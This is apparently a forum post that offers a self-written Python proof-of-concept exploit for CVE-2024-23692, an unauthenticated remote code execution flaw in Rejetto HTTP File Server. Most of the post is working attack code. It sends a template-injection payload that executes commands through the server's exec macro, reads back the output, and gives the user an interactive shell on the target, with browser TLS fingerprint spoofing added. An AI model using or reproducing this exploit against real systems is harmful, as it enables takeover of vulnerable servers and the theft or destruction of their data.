Simple tool to help you explore it, written by me The method of use is already well written in the tool, questions just ask more about in this paper (https://mohemiv.com/all/rejetto-http-fil...cated-rce/) Code: # release - 15:03 06/11/24 - nwrb from typing import List from re import findall, DOTALL from urllib.parse import quote_plus from argparse import ArgumentParser, Namespace from rich.console import Console from prompt_toolkit.formatted_text import HTML from prompt_toolkit.history import InMemoryHistory from prompt_toolkit import PromptSession, print_formatted_text from tls_client import Session from re import findall, DOTALL from tls_client.response import Response console: Console = Console() def _dict_to_query_url(params: dict) -> str: """ parse query """ return "&".join(f"{key}={value}" for key, value in params.items()) def _command(session: Session, url: str, command: str = "dir") -> str: """ send payload """ params: dict = { 's': '%0A', 'cmd': quote_plus(command, safe=",/"), 'search': '%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}' } resp: Response = session.get( f"{url}/?{_dict_to_query_url(params)}", ) matches: List | None = findall(r"submit\({}, \".*? RESULT:(.*?)====", resp.text, DOTALL) if matches: return matches[0] return "" def interactive_shell(url: str) -> None: """ simple bash """ session: Session = Session( client_identifier="chrome112", random_tls_extension_order=True ) bash: PromptSession = PromptSession(history=InMemoryHistory()) while True: try: cmd: str = bash.prompt( HTML("<ansiblue><b>$ </b></ansiblue>"), default="" ).strip() if cmd.lower() == "exit": break elif cmd.lower() == "clear": console.clear() continue output: str | None = _command(session, url, cmd) print(f"{output.strip()}\n") except KeyboardInterrupt: break def main() -> None: """ main magicland """ console.clear() print_formatted_text(HTML("<ansibrightblack><b>CVE-2024-23692</b></ansibrightblack> - simple poc\n")) parser: ArgumentParser = ArgumentParser() parser.add_argument( "-u", "--url", help="Base URL for single target", default=None ) args: Namespace = parser.parse_args() if args.url: interactive_shell(args.url) else: parser.error("No URL or file provided. Use -u to specify a single URL.") if __name__ == "__main__": main()